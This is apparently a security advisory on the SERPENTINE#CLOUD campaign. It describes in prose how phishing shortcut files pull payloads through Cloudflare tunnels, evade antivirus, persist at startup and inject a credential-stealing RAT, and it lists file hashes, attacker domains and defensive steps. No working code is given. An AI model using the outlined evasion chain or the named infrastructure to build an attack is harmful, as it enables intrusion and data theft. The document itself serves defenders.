Analysis Summary

A sophisticated malware campaign dubbed SERPENTINE#CLOUD has emerged, exploiting Cloudflare’s tunneling service to stealthily deliver multi-stage Python-based malware. This operation marks a significant leap in cybercriminal tactics, leveraging legitimate cloud infrastructure, advanced evasion techniques, and social engineering to infiltrate organizations primarily across the US, UK, Germany, and parts of Europe and Asia. Initial access is achieved via phishing emails containing malicious .lnk (shortcut) files disguised as PDF documents, typically crafted around invoice themes to deceive business users. The campaign’s use of trycloudflare.com subdomains allows attackers to bypass conventional security filters by blending malicious traffic with legitimate Cloudflare usage.

According to the Researcher, the infection chain is highly modular and layered, beginning with a disguised shortcut file that runs a command invoking Windows’ robocopy utility to pull malicious payloads from WebDAV shares hosted on Cloudflare’s infrastructure. This process retrieves a .wsf (Windows Script File) that then executes a remote batch script from a secondary Cloudflare tunnel. The multi-domain architecture and use of native Windows tools significantly complicate detection and analysis. Each stage of this infection chain is designed to increase stealth and resilience, showcasing a deep understanding of system internals and security evasion techniques.

One of the most advanced components of the campaign is the batch file stage, which uses UTF-16LE encoding, variable obfuscation, and anti-AV checks to stay undetected. This stage also drops decoy PDF files to divert user suspicion, downloads complete Python environments, and sets up Windows startup folder persistence. The payloads are then used to run a Python-based shellcode loader that implements Early Bird APC injection, a stealthy method of injecting shellcode into memory without touching disk, enabling fileless persistence.

The final payload is a Donut-packed Remote Access Trojan (RAT) capable of stealing credentials, browser session data, and other sensitive information. The RAT maintains command-and-control communication via various domains, including nhvncpure .shop, nhvncpure.sbs, and dynamic DNS platforms like DuckDNS. The campaign reflects nation-state-level sophistication, though attribution remains unclear. However, the English language fluency in the code, careful infrastructure selection, and scalable delivery methods indicate a well-funded and capable adversary possibly testing infrastructure for wider operations.

Impact

• Sensitive Information Theft
• Security Bypass
• Remotely Access
• Gain Access

Indicators of Compromise

SHA1

• a0a0c84f5eee22b4a8ae594792069d4dbeb99867
• f6b940d7eb2331ce8e27d125cf96b53fffbe1313
• cbe89b3de55ad522be8222e1018057de44e3e9a9
• 037736cf63cf047f5165f0b6e0ab1d86d3d96512
• dc773f84f5b1bf39cfede5f87b7f6ce58315c5e9
• ce61eb2033737cb0e37ea32c14340fa712d93694

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Block unauthorized outbound traffic to Cloudflare Tunnel domains (e.g., trycloudflare.com).
• Monitor network traffic for suspicious use of CloudFlare binaries or unusual tunnel activity.
• Implement application allowlisting to prevent unauthorized execution of Python scripts and tunneling tools.
• Use endpoint detection and response (EDR) solutions to detect Python-based malware behavior.
• Regularly update antivirus and threat detection signatures to identify tunneling malware.
• Educate employees on phishing and social engineering tactics used to deliver initial payloads.
• Isolate and analyze suspicious Python scripts or binaries in a sandbox environment before execution.
• Implement strict access controls and privilege management on systems to limit lateral movement.